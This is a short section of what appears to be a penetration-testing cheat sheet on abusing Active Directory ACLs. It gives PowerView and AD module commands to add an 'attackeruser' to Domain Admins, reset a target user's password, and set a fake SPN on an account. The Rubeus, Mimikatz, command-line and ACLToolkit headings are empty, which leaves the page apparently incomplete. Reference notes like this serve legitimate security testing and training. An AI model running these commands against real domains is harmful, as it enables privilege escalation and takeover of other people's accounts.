18. ACL Abuse Tactics
PowerShell (PowerView/Active Directory Module):
# Retrieve ACL for a user
Get-ObjectAcl -SamAccountName "targetuser" -ResolveGUIDs
# Add a user to the Domain Admins group
Add-DomainGroupMember -Identity "Domain Admins" -Members "attackeruser"
# Reset a user's password
Set-DomainUserPassword -Identity "targetuser" -AccountPassword (ConvertTo-SecureString "NewPassword" -AsPlainText -Force)
# Modify SPN for a user
Set-ADObject -Identity "targetuser" -Set @{servicePrincipalName="fake/spn"}
# Get user information
Get-ADUser targetuser
# Get group information
Get-ADGroup "groupname"Rubeus:
Mimikatz:
Windows Command Line:
ACLToolkit:
Last updated